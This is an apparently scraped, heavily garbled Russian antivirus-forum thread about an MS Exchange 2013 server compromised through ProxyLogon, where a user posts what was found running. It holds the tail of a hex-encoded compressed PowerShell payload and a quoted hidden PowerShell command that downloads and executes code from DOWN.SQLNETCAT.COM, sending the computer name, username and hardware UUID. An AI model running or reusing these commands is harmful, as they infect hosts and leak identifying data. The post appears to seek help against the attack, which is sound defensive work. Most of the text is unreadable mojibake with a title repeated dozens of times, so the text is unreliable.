7f984f0827a2ab9435abbc098930047c35303572d2b26a1001d501852262b28d4f27156f57bce16602eb7b001dfb1cd8f4886844e7502d97cf8278e8047df17e657ab95cbd45debb5be3b9c8ec4a18c6dd7a9b45d1f4ee08dbc4461e293e30ae8ec0787a77c491846c81ea10609e5310b6313a70d36c560c280627439c25a92851f96ee5148d66358af56ecef92c6cb96203578b257197e76c2eda40fdcd6b528bcd4b3aeaf7eac25b58b948b6c8bc5cb55266cd2bdc0d899a2b128dd7456a6e88347e51a626245030c9477d0ba9e8e205b1784eab58f457b9a6f6d68ada7f952fa9bda5a9534cfafa27b573e1b6d1dce64da26acb507652d1efa85615bebad2aaa2db0c30a82ddad436f919ea6cb42a173d14b7a8317bc291eee45212b8fd6c94dfd8fc44f01dd8fc4451ba52c6e729a58daaa40272f495553afabd634354b9b1ace67d24bea94100c2a14842b920c29c541d3c54a11a763ac2deddfc6442376998dce2db5156d5c6308a65bc7d00114a612ccf9d6875d96c54f59addd217851454ba08db5ef7e437f4801acc820e02504c47b1aa54bfa37a6d7b8beccc65f3d656890a7b4ebde821fe2531934b9546c817417eae439cf40a8abe8a9eeb8edc52b1c5f70a63fb1d2798d4465237f40f50a4d519631c4dfc7b648cc83a9eb9530bad3c5f0de86a09967dd8cbe2f6616beb595b980bfc91180643065db4b9cbc5f4e3bc80401be6e840af5c66e6b055a2191d299d3975f57922b8118f997d12c171494587879dde51b76b03f1f3f269b99462b2450a5e72a2a0594a86171b405f1c59ed6033b1ccec2f694205afd290021d38f246b0475e5b8fee3d1bb9964fe1236fdc5e1eb7e1ced8466544b7368e2f8932ef7d295775e95c94c7ec404463105891d01a8d5a73f7600f7f60d046d6bbbccd426ca1484a9250e4a214d377c017c65b1e02e29235b35a16204b864585c01d4f27419ba0ca7c935b6e3e20a0936ce642f56c327f872668f57831f270ee5eadef317b3e2810f9d6564816a8b57208599a4cd3b6feeed793df07ef2f8f3aef07e79da377dd8b937eeff2f4e653e7faa44f7fb58469dc5e1e2ff52f4723dfa54c5a7a203b7c8a1ff65acdc605008da95d19e2df046c627a135fcfa2fef5c959b77773fd7b7fc11b4c1e1ca9a8c92ad404e9240aad442aa39fe0bd7a899f7d62fde258414bf15d1cfdb3b909b5790532e55a317f2dc674cc383f3c6402ba4f20eb4efcc0e3d3f20d0238068cf1c4c73af9611e0e7716bd5fdfabe08f0f3e74b9a135b8b3da60d12f0dfa97b32c88e3a9f9bce842f2bf01d2a998b771c8f34f33fa45b3b370eae53a3c192d27599f7c4b999e0695cdb9eba741347f005f1c72f14d4d391ed591c1d98c3ad9866665749a748c8c42fe520a51b98cdb2be1a3983e3fe70501dfe7859755cf394eb7bebfe4c92b1e2e7868e65ab143032bd96799c0f906ef7733be0b871fc75e88b39a969d3d66b96ab672c4294274c71f0d90a882e2bf3c56d5a2de7891eb74da9a4eed201e2b969b0ca1c99cd9f3f6df'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

�� ? �� "��" �� ?
17.03.2021 17:14:21, �� .

�� MS Exchange 2013

Wed, 17 Mar 2021 17:11:16 +0300

�� MS Exchange 2013 ProxyLogon � �� .
��.
17.03.2021 17:11:16, �� .

�� MS Exchange 2013

Wed, 17 Mar 2021 17:10:12 +0300

�� MS Exchange 2013 ProxyLogon � �� .
�� ?
C:\PROGRAM FILES (X86)\LITEMANAGER PRO - SERVER\ROMSERVER.EXE

�� , �� .

====quote====
C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
-W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
=============

update: ��, �� DOWN.SQLNETCAT.COM, (�� 20210317 �� ), � ��, powershell.exe �� , � ��.
17.03.2021 17:10:12, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 16:49:30 +0300

�� MS Exchange 2013 ProxyLogon � �� .
��. MS Exchange 2013 �� . �� . �� "��", ��. �� , �� . �� .
�� . �� , �� .
SPHVMAIL01_2021-03-17_16-33-37_v4.11.6.7z
17.03.2021 16:49:30, �� .

����� esetnod32.ru [����: ������ ������� �� �������� � MS Exchange 2013]

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

�� esetnod32.ru [��: �� MS Exchange 2013]

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013